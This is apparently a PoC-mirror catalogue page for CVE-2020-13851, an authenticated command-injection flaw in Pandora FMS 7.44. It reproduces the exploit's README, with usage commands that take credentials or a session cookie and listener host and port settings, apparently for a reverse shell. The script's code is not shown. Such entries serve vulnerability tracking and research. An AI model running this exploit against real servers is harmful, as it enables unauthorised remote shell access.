CVE-2020-13851 PoC — Artica Pandora FMS 操作系统命令注入漏洞

Source

https://github.com/hadrian3689/pandorafms_7.44

Associated Vulnerability

Title:Artica Pandora FMS 操作系统命令注入漏洞 (CVE-2020-13851)
Description:Artica Pandora FMS 7.44 allows remote command execution via the events feature.

Description

CVE-2020-13851 Pandora FMS 7.44

Readme

# Pandora FMS 7.44 CVE-2020-13851

Pandora FMS 7.44 CVE-2020-13851 RCE allows an authenticated user to achieve remote command execution via the events feature. Can be done with credentials or a PHP session cookie.

## Getting Started

### Executing program

* Using credentials
```
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
```
* Using PHP session cookie
```
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
```

## Help

For Help Menu
```
python3 pandorafms_7.44.py -h
```

## Acknowledgments

* [Core Security](https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities)

## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

File Snapshot


 [4.0K]  /data/pocs/8b4be452e8b38c0af4583b400e8c2f3c34f95bbc
├── [2.9K]  pandorafms_7.44.py
└── [1.2K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!